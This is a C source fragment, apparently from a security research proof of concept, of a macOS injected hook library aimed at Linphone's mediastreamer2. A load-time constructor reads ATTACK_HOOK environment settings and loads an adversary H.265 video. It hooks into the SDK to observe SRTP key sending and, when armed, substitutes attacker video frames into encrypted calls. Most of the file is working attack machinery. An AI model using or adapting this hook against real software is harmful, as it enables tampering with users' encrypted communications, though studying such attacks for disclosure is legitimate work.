static int g_observers_registered = 0;

static void attack_hook_try_register_observers(void) {
    pthread_mutex_lock(&g_register_lock);
    if (g_observers_registered) {
        pthread_mutex_unlock(&g_register_lock);
        return;
    }
    typedef void (*set_send_obs_fn)(void *);
    typedef void (*set_sub_fn)(void *);
    set_send_obs_fn set_send = NULL;
    set_sub_fn set_sub = NULL;

    /* Scan loaded images for one whose path contains "mediastreamer2",
     * dlopen it with RTLD_NOLOAD to get a handle into the already-mapped
     * image, and dlsym the two patch symbols. */
    uint32_t count = _dyld_image_count();
    for (uint32_t i = 0; i < count; i++) {
        const char *name = _dyld_get_image_name(i);
        if (!name || !strstr(name, "mediastreamer2")) continue;
        void *handle = dlopen(name, RTLD_LAZY | RTLD_NOLOAD);
        if (!handle) continue;
        void *s1 = dlsym(handle, "ms_attack_set_inner_send_key_observer");
        void *s2 = dlsym(handle, "ms_attack_set_inner_protect_substitution");
        /* Resolve srtp_get_stream_roc through the same handle —
         * libsrtp is statically linked into libmediastreamer2 so this
         * is where its exported symbols live. */
        void *s3 = dlsym(handle, "srtp_get_stream_roc");
        if (s3) {
            g_get_stream_roc = (get_stream_roc_fn)s3;
        }
        /* Don't dlclose: RTLD_NOLOAD increments the refcount, so
         * dlclose would decrement to zero and could unmap; safer to
         * leak the handle (process-lifetime). */
        if (s1 && s2) {
            set_send = (set_send_obs_fn)s1;
            set_sub  = (set_sub_fn)s2;
            break;
        }
    }

    if (set_send && set_sub) {
        set_send((void *)&observer_inner_send_key);
        set_sub((void *)&observer_inner_protect_substitution);
        g_observers_registered = 1;
        hook_log("registered SDK observers — patch is active (srtp_get_stream_roc=%p)",
                 (void *)g_get_stream_roc);
    }
    pthread_mutex_unlock(&g_register_lock);
}

static void attack_hook_on_image_added(const struct mach_header *mh,
                                       intptr_t slide) {
    (void)mh; (void)slide;
    attack_hook_try_register_observers();
}

__attribute__((constructor))
static void attack_hook_init(void) {
    const char *video = getenv("ATTACK_HOOK_VIDEO");
    if (!video || !*video) {
        video = "src-video/video_01_idr_only.h265";
    }
    /* Load both the legacy per-NAL stream (for the old substitution
     * path that ships a single random NAL + FD_NUT per packet) and the
     * IDR-only AP stream (for the §5.4.2.1 path that ships an entire
     * self-contained H.265 frame as a RFC 7798 Aggregation Packet).
     * The AP path is preferred when ready. */
    if (adversary_nals_load(video) != 0) {
        hook_log("WARNING: failed to load legacy adversary stream at %s", video);
    }
    if (adversary_idr_stream_load(video) != 0) {
        hook_log("WARNING: failed to load IDR-only adversary stream at %s — "
                 "AP-format substitution will fall back to single-NAL mode",
                 video);
    }

    const char *arm = getenv("ATTACK_HOOK_ARM");
    g_arm = (arm && (arm[0] == '1' || arm[0] == 'y' || arm[0] == 'Y'));

    const char *fp = getenv("ATTACK_HOOK_FORCE_POSITION");
    if (fp && fp[0] >= '0' && fp[0] <= '2' && fp[1] == 0) {
        g_force_position = fp[0] - '0';
    }

    hook_log("loaded (interposing inner_send_key, srtp_create, srtp_protect, "
             "srtp_get_stream_roc external) — adversary_video=%s arm=%s "
             "force_position=%d (-1 = size heuristic)",
             video, g_arm ? "YES (will substitute)" : "no (observe-only)",
             g_force_position);

    /* Try to register the SDK-patch observers. macOS uses a two-level
     * namespace and `dlsym(RTLD_DEFAULT, ...)` only sees symbols in the
     * main executable's namespace — the mediastreamer2 framework loaded
     * via @rpath stays out of reach unless we look up its handle
     * explicitly. We register a dyld image-load callback; for every
     * loaded (and future-loaded) image whose path contains
     * "mediastreamer2", we dlopen it with RTLD_NOLOAD (to get a handle
     * to the already-mapped image) and try to resolve the two setter
     * symbols. First success wins, callback short-circuits after.
     *
     * If the SDK was built without patch 0002, no image will export
     * these symbols and we silently fall back to the DYLD_INTERPOSE
     * entries (which are useful on dynamic-libsrtp builds, even if
     * they don't fire on Linphone's static-link build). */
    _dyld_register_func_for_add_image(attack_hook_on_image_added);
    /* Also try right now — any image already loaded at our ctor time. */
    attack_hook_try_register_observers();
}
